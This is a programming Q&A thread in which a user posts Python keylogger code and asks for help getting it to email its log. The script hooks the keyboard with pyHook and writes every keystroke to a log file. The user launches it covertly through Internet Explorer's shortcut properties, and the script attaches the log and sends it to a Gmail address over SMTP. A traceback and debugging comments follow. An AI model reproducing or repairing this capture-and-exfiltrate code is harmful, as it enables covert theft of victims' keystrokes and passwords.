# Sending an email attachment in mail using python

Tags: python, smtp, email-attachments, keylogger

I have made a simple keylogger which logs the keystrokes in the file called `'log.txt'`. I want to then email this file by attaching it using smtp in python but unable to do so. Keylogger is working fine but the email is not sent. (For keylogger I attached the path of the file `launch.bat` to IEXPLORE properties) Why is it not working?

My code:

```
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
import os
import email
import email.encoders
import email.mime.text
import pyHook, pythoncom, sys, logging

file_log = 'C:\\important\\log.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

sender = 'abc@gmail.com'
receiver = ['xyz@gmail.com']
message = """From: From Shubha Goel <abc@gmail.com>
To: To  Pooja Gupta<xyz@gmail.com>
Subject: SMTP e-mail test

This is a test e-mail message.
"""
file_name = 'C:\\important\\log.txt'
#msg = MIMEMultipart()
msg=email.MIMEMultipart.MIMEMultipart('mixed')
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = message
msg['Date'] = email.Utils.formatdate(localtime=True)

# build the attachment
att = email.MIMEBase.MIMEBase('application', 'base64')
att.set_payload(open(file_name, 'rb').read())
email.Encoders.encode_base64(att)
att.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(file_name))
msg.attach(att)
print 'successfully built attachment'
try:
    session = smtplib.SMTP('smtp.gmail.com',587)
    print 'Starting..'
    session.ehlo()
    print 'ehlo executed..'
    session.starttls()
    print 'starttls done'

    session.login(sender,password)
    print 'logged in'
    session.sendmail(sender,receiver,msg.as_string())
    print 'sendmail executed..now quitting'


except smtplib.SMTPRecipientsRefused:
    print 'Recipient refused'
except smtplib.SMTPAuthenticationError:
    print 'Auth error'
except smtplib.SMTPSenderRefused:
    print 'Sender refused'
except smtplib.SMTPException:
    print('Error')
```

Please Help. I am new to smtp and keylogger.

stacktrace:

```
Traceback (most recent call last):
  File "<pyshell#3>", line 1, in <module>
    execfile('C:\important\secret_file.pyw')
  File "C:\important\secret_file.pyw", line 44, in <module>
    session.sendmail(sender,receiver,msg.as_string())
  File "C:\Python27\lib\email\message.py", line 137, in as_string
    g.flatten(self, unixfrom=unixfrom)
  File "C:\Python27\lib\email\generator.py", line 83, in flatten
    self._write(msg)
  File "C:\Python27\lib\email\generator.py", line 115, in _write
    self._write_headers(msg)
  File "C:\Python27\lib\email\generator.py", line 164, in _write_headers
    v, maxlinelen=self._maxheaderlen, header_name=h).encode()
  File "C:\Python27\lib\email\header.py", line 410, in encode
    value = self._encode_chunks(newchunks, maxlinelen)
  File "C:\Python27\lib\email\header.py", line 370, in _encode_chunks
    _max_append(chunks, s, maxlinelen, extra)
  File "C:\Python27\lib\email\quoprimime.py", line 97, in _max_append
    L.append(s.lstrip())
AttributeError: 'list' object has no attribute 'lstrip
```

Comment: Please mention what `error/traceback` you get upon executing the code.

Comment: @pss : on running this script.. it is not stopping the execution and nothing is getting printed . :(

Comment: please somebody help me at this .. it is very urgent

Comment: please do not close this question because such questions have been asked before

Comment: You may try to use "divide and conquer" policy. Try using print statements in your code and see where did something went wrong or where does the execution goes to infinity. Separate the keylogger part and the email part. First verify if the keylogger part works fine. Then try to verify if the email part's code snippet works fine. When both scripts are working fine. Just combine them. I can't test your code now, unfortunately python suddenly just blew off from my system after the weekend. Maybe he was hungry and is searching for some meal. :P

Comment: For an instance in your code you have a `print 'successfully built attachment'`. If this doesn't shows up in the output then it is obvious that the control never reached here and something above this statement ate up the execution. :)

Comment: @pss: thank you so much :) but attachment is not there in the email .. can you see what is the problem

Comment: @pss: i have posted stack trace .. Please can you see?